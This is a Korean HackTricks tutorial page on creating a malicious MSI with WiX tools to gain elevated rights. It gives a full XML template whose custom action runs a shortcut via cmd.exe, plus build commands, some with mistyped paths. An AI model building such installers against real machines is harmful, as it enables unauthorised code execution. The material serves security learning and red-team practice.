Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

์•…์„ฑ MSI ์ƒ์„ฑ ๋ฐ ๋ฃจํŠธ ๊ถŒํ•œ ํš๋“

MSI ์„ค์น˜ ํ”„๋กœ๊ทธ๋žจ์˜ ์ƒ์„ฑ์€ wixtools๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ˆ˜ํ–‰๋˜๋ฉฐ, ํŠนํžˆ wixtools๊ฐ€ ํ™œ์šฉ๋ฉ๋‹ˆ๋‹ค. ๋Œ€์ฒด MSI ๋นŒ๋”๊ฐ€ ์‹œ๋„๋˜์—ˆ์œผ๋‚˜, ์ด ํŠน์ • ๊ฒฝ์šฐ์—๋Š” ์„ฑ๊ณตํ•˜์ง€ ๋ชปํ–ˆ๋‹ค๋Š” ์ ์€ ์ฃผ๋ชฉํ•  ๋งŒํ•ฉ๋‹ˆ๋‹ค.

wix MSI ์‚ฌ์šฉ ์˜ˆ์— ๋Œ€ํ•œ ํฌ๊ด„์ ์ธ ์ดํ•ด๋ฅผ ์œ„ํ•ด ์ด ํŽ˜์ด์ง€๋ฅผ ์ฐธ์กฐํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—์„œ๋Š” wix MSI ์‚ฌ์šฉ์„ ๋ณด์—ฌ์ฃผ๋Š” ๋‹ค์–‘ํ•œ ์˜ˆ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ชฉํ‘œ๋Š” lnk ํŒŒ์ผ์„ ์‹คํ–‰ํ•  MSI๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋ฅผ ๋‹ฌ์„ฑํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ XML ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค (xml from here):

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

Package ์š”์†Œ์—๋Š” InstallerVersion ๋ฐ Compressed์™€ ๊ฐ™์€ ์†์„ฑ์ด ํฌํ•จ๋˜์–ด ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๊ฐ๊ฐ ์„ค์น˜ ํ”„๋กœ๊ทธ๋žจ์˜ ๋ฒ„์ „์„ ์ง€์ •ํ•˜๊ณ  ํŒจํ‚ค์ง€๊ฐ€ ์••์ถ•๋˜์—ˆ๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค.

์ƒ์„ฑ ๊ณผ์ •์—๋Š” wixtools์˜ ๋„๊ตฌ์ธ candle.exe๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ msi.xml์—์„œ wixobject๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. ๋‹ค์Œ ๋ช…๋ น์„ ์‹คํ–‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค:

candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml

์ถ”๊ฐ€์ ์œผ๋กœ, ๊ฒŒ์‹œ๋ฌผ์— ๋ช…๋ น๊ณผ ๊ทธ ์ถœ๋ ฅ์ด ํฌํ•จ๋œ ์ด๋ฏธ์ง€๊ฐ€ ์ œ๊ณต๋œ๋‹ค๋Š” ์ ์„ ์–ธ๊ธ‰ํ•  ๊ฐ€์น˜๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์‹œ๊ฐ์  ์•ˆ๋‚ด๋ฅผ ์œ„ํ•ด ์ฐธ์กฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋˜ํ•œ, wixtools์˜ ๋˜ ๋‹ค๋ฅธ ๋„๊ตฌ์ธ light.exe๊ฐ€ wixobject์—์„œ MSI ํŒŒ์ผ์„ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์‹คํ–‰ํ•  ๋ช…๋ น์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix

์ด์ „ ๋ช…๋ น๊ณผ ์œ ์‚ฌํ•˜๊ฒŒ, ๋ช…๋ น๊ณผ ๊ทธ ์ถœ๋ ฅ์„ ์„ค๋ช…ํ•˜๋Š” ์ด๋ฏธ์ง€๊ฐ€ ๊ฒŒ์‹œ๋ฌผ์— ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ์š”์•ฝ์ด ์œ ์šฉํ•œ ์ •๋ณด๋ฅผ ์ œ๊ณตํ•˜๋Š” ๊ฒƒ์„ ๋ชฉํ‘œ๋กœ ํ•˜์ง€๋งŒ, ๋ณด๋‹ค ํฌ๊ด„์ ์ธ ์„ธ๋ถ€์ •๋ณด์™€ ์ •ํ™•ํ•œ ์ง€์นจ์„ ์œ„ํ•ด ์›๋ณธ ๊ฒŒ์‹œ๋ฌผ์„ ์ฐธ์กฐํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค.

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ